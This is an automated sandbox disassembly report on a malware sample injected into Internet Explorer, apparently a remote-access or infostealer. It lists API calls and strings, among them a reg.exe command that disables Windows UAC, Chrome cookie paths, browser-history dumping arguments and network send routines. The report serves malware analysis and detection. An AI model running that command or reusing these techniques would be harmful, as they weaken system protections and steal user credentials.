              • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
              • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
              • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
              APIs
              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
              • CloseHandle.KERNEL32(?), ref: 004077AA
              • CloseHandle.KERNEL32(?), ref: 004077AF
              Strings
              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
              • C:\Windows\System32\cmd.exe, xrefs: 00407796
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandle$CreateProcess
              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
              • API String ID: 2922976086-4183131282
              • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
              • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
              • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
              • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
              Strings
              • SG, xrefs: 004076DA
              • C:\Program Files (x86)\Internet Explorer\iexplore.exe, xrefs: 004076C4
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: SG$C:\Program Files (x86)\Internet Explorer\iexplore.exe
              • API String ID: 0-1275280225
              • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
              • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
              • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
              • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
              APIs
              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
              • String ID: KeepAlive | Disabled
              • API String ID: 2993684571-305739064
              • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
              • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
              • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
              • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
              APIs
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
              • Sleep.KERNEL32(00002710), ref: 0041AE07
              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: PlaySound$HandleLocalModuleSleepTime
              • String ID: Alarm triggered
              • API String ID: 614609389-2816303416
              • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
              • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
              • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
              • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
              APIs
              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
              Strings
              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Console$AttributeText$BufferHandleInfoScreen
              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
              • API String ID: 3024135584-2418719853
              • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
              • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
              • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
              • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
              APIs
                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
              • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
              • String ID:
              • API String ID: 4269425633-0
              • Opcode ID: 340df89f7b7462a5cf1a3eb52fc607024e8c20bd1839c838a7e8e46198f65b91
              • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
              • Opcode Fuzzy Hash: 340df89f7b7462a5cf1a3eb52fc607024e8c20bd1839c838a7e8e46198f65b91
              • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                • Part of subcall function 00446137: HeapAlloc.KERNEL32(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
              • _free.LIBCMT ref: 0044F3BF
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
              • String ID:
              • API String ID: 2278895681-0
              • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
              • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
              • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
              • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
              APIs
              • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
              • _free.LIBCMT ref: 004482D3
              • _free.LIBCMT ref: 004482FA
              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
              • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
              • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
              • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
              APIs
              • _free.LIBCMT ref: 004509D4
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 004509E6
              • _free.LIBCMT ref: 004509F8
              • _free.LIBCMT ref: 00450A0A
              • _free.LIBCMT ref: 00450A1C
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
              • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
              • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
              • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
              APIs
              • _free.LIBCMT ref: 00444066
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00444078
              • _free.LIBCMT ref: 0044408B
              • _free.LIBCMT ref: 0044409C
              • _free.LIBCMT ref: 004440AD
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
              • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
              • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
              • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: @"a/
              • API String ID: 0-2936340451
              • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
              • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
              • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
              • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CountEventTick
              • String ID: !D@$NG
              • API String ID: 180926312-2721294649
              • Opcode ID: f1aeb24031a97e284b4753a3f7782d265eec5a74dd44512445aa2e656a17a70c
              • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
              • Opcode Fuzzy Hash: f1aeb24031a97e284b4753a3f7782d265eec5a74dd44512445aa2e656a17a70c
              • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
              APIs
              • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CreateFileKeyboardLayoutNameconnectsend
              • String ID: XQG$NG$PG
              • API String ID: 1634807452-3565412412
              • Opcode ID: 65bcda24485f229627bc1ba86599248e7ef5d7ff0ceab21bd896230ddc91b8df
              • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
              • Opcode Fuzzy Hash: 65bcda24485f229627bc1ba86599248e7ef5d7ff0ceab21bd896230ddc91b8df
              • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
              APIs
              • _free.LIBCMT ref: 00452F89
                • Part of subcall function 00452D79: __alloca_probe_16.LIBCMT ref: 00452DE2
                • Part of subcall function 00452D79: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452E3F
                • Part of subcall function 00452D79: __freea.LIBCMT ref: 00452E48
              • _free.LIBCMT ref: 00452EDF
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00452F1A
                • Part of subcall function 00445AF3: HeapAlloc.KERNEL32(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorHeapLast_free$AllocByteCharFreeMultiWide__alloca_probe_16__freea
              • String ID: @"a/
              • API String ID: 1317440246-2936340451
              • Opcode ID: 002d8f7f5af11c0749cb7654895c3d8eda478d8b80c4c83c26d6536e7ac70b0a
              • Instruction ID: ccdd9cb3de202117adee29f47408f3b5f6a1d77b5c6470f84ce848334012e277
              • Opcode Fuzzy Hash: 002d8f7f5af11c0749cb7654895c3d8eda478d8b80c4c83c26d6536e7ac70b0a
              • Instruction Fuzzy Hash: 8541C572900215ABDF219F25DC41FAB7BB8AF46715F40419BFC08E2242DE79CE449B65
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: `#D$`#D
              • API String ID: 885266447-2450397995
              • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
              • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
              • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
              • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\Internet Explorer\iexplore.exe,00000104), ref: 00443475
              • _free.LIBCMT ref: 00443540
              • _free.LIBCMT ref: 0044354A
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Program Files (x86)\Internet Explorer\iexplore.exe
              • API String ID: 2506810119-908218840
              • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
              • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
              • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
              • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
              APIs
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,?,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0044BB7E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CE84,?), ref: 0044B900
              • GetLastError.KERNEL32(?,0044BB7E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CE84,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B931
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharErrorFileLastMultiWideWrite
              • String ID: @"a/
              • API String ID: 2456169464-2936340451
              • Opcode ID: 45b30aa491ac8650baadb11fddd3d70834055c7c1d6817fc490f027624ef462a
              • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
              • Opcode Fuzzy Hash: 45b30aa491ac8650baadb11fddd3d70834055c7c1d6817fc490f027624ef462a
              • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
              APIs
              • __alloca_probe_16.LIBCMT ref: 00452DE2
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452E3F
              • __freea.LIBCMT ref: 00452E48
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide__alloca_probe_16__freea
              • String ID: @"a/
              • API String ID: 3062693170-2936340451
              • Opcode ID: 08072a92ddfb6cb17d38c41db4d8ff4a5f9d8a0aed595a354ed724e0bbe11d20
              • Instruction ID: c2c936b26b43f3ed25a22525db3567d33f4726031da11e7c93dcecdd16d5eaf1
              • Opcode Fuzzy Hash: 08072a92ddfb6cb17d38c41db4d8ff4a5f9d8a0aed595a354ed724e0bbe11d20
              • Instruction Fuzzy Hash: 14313432A00156ABDB249F65CC42DAFBBA4EF45714F18426AFC14DB292DB38CC88C7D4
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
              • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
              • String ID: /sort "Visit Time" /stext "$0NG
              • API String ID: 368326130-3219657780
              • Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
              • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
              • Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
              • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
              APIs
              • _free.LIBCMT ref: 00449533
              • _free.LIBCMT ref: 00449589
                • Part of subcall function 00449365: _free.LIBCMT ref: 004493BD
                • Part of subcall function 00449365: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                • Part of subcall function 00449365: WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                • Part of subcall function 00449365: WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$ByteCharMultiWide$InformationTimeZone
              • String ID: @"a/
              • API String ID: 314583886-2936340451
              • Opcode ID: eaf586b2930d01511b6716dfae134002a73728fcce14da89e08ad40e86166e4e
              • Instruction ID: 71864bc9f516c926395d8cbc54ce5419a09c8d5b8e962516e31e57181dbe1d14
              • Opcode Fuzzy Hash: eaf586b2930d01511b6716dfae134002a73728fcce14da89e08ad40e86166e4e
              • Instruction Fuzzy Hash: 8C213E7380011477FB31A6659C81DEB736CDB91364F20029BF958A2181DE384EC1969D
              APIs
              • _wcslen.LIBCMT ref: 004162F5
                • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _wcslen$CloseCreateValue
              • String ID: !D@$okmode$PG
              • API String ID: 3411444782-3370592832
              • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
              • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
              • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
              • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
              APIs
                • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
              Strings
              • User Data\Default\Network\Cookies, xrefs: 0040C603
              • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
              • API String ID: 1174141254-1980882731
              • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
              • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
              • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
              • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
              APIs
